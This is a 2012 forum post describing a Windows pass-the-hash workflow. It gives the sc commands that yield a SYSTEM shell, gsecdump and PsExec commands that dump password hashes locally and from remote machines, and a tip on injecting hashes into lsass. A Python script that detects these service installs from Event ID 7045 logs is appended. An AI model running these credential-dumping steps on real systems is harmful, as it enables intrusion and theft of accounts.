Title: Hash injection attack
Author: admin  Time: 2012-11-6 21:09

To get a DOS Prompt as NT system:

C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS

C:\>sc start shellcmdline
[SC] StartService FAILED 1053:
The service did not respond to the start or control request in a timely fashion.

C:\>sc delete shellcmdline
[SC] DeleteService SUCCESS
------------
Then in the new DOS window:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM

C:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
usage: gsecdump [options]

options:
-h [ --help ] show help
-a [ --dump_all ] dump all secrets
-l [ --dump_lsa ] dump lsa secrets
-w [ --dump_wireless ] dump microsoft wireless connections
-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ] dump hashes from SAM/AD

Although I like to use:

PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

to get the hashes from active logon sessions of a remote system.

These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.

A tip: you can use iam from the pshtools toolkit to import the hash information just grabbed with gsecdump into the local lsass process and carry out a hash injection attack. The foreigners really are good at this; administrators will have their work cut out for them now. The LM/NT hashes obtained during ARP spoofing, and those obtained with gethash, actually don't need to be cracked at all; it is just a matter of using the tools. As the original article puts it well: no matter whether the password is 4 characters or 127 characters, once you have the hash it is 100% done.

Original source: http://truesecurity.se/blogs/mur ... -text-password.aspx

I had a look at the original source; it seems to be from /2007/03/16/. Depressing, what a gap.
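A detection-side counterpart, added here and not part of the original post or of any tool it mentions: it parses constructed Windows System log Event ID 7045 ("A service was installed in the system") messages and flags the two installs the steps above leave behind, a service whose image is an interactive shell (the sc create shellcmdline step) and a PsExec service (assumed to use PsExec's default service name PSEXESVC).

```python
"""Flag service installs that match the post's technique, from Event ID 7045 text."""
import re

# Constructed 7045 messages modelled on the post's "sc create shellcmdline"
# and PsExec steps, plus a benign install (Spooler) for comparison.
SAMPLE_7045 = [
    "A service was installed in the system.\n"
    "Service Name:  shellcmdline\n"
    "Service File Name:  C:\\WINDOWS\\system32\\cmd.exe /K start\n"
    "Service Type:  user mode service\n"
    "Service Start Type:  demand start\n"
    "Service Account:  LocalSystem",
    "A service was installed in the system.\n"
    "Service Name:  PSEXESVC\n"
    "Service File Name:  %SystemRoot%\\PSEXESVC.exe\n"
    "Service Type:  user mode service\n"
    "Service Start Type:  demand start\n"
    "Service Account:  LocalSystem",
    "A service was installed in the system.\n"
    "Service Name:  Spooler\n"
    "Service File Name:  %SystemRoot%\\System32\\spoolsv.exe\n"
    "Service Type:  user mode service\n"
    "Service Start Type:  auto start\n"
    "Service Account:  LocalSystem",
]

# "Service Start Type" is deliberately not matched (no "Start" alternative).
FIELD = re.compile(r"^Service (Name|File Name|Type|Account):\s+(.*)$", re.M)
# A service whose image is a shell interpreter rather than a service binary.
SHELL_IMAGE = re.compile(r"\\(cmd|powershell|wscript|cscript)\.exe\b", re.I)
# Assumption: PsExec installs its helper under this default service name.
PSEXEC_NAME = re.compile(r"^psexesvc$", re.I)


def parse_7045(message: str) -> dict:
    """Return the Name / File Name / Type / Account fields of one 7045 event."""
    return {key: value.strip() for key, value in FIELD.findall(message)}


def reasons_for(event: dict) -> list:
    """Explain why a parsed service install looks like the post's technique."""
    reasons = []
    if SHELL_IMAGE.search(event.get("File Name", "")):
        reasons.append("service image is an interactive shell")
    if PSEXEC_NAME.match(event.get("Name", "")):
        reasons.append("PsExec service installed")
    return reasons


def scan(messages: list) -> dict:
    """Map flagged service names to their reasons; benign installs are omitted."""
    flagged = {}
    for message in messages:
        event = parse_7045(message)
        reasons = reasons_for(event)
        if reasons:
            flagged[event.get("Name", "?")] = reasons
    return flagged
```

Pair the service-image check with the account field when triaging: a shell running as LocalSystem, as in the post, is the case worth paging on.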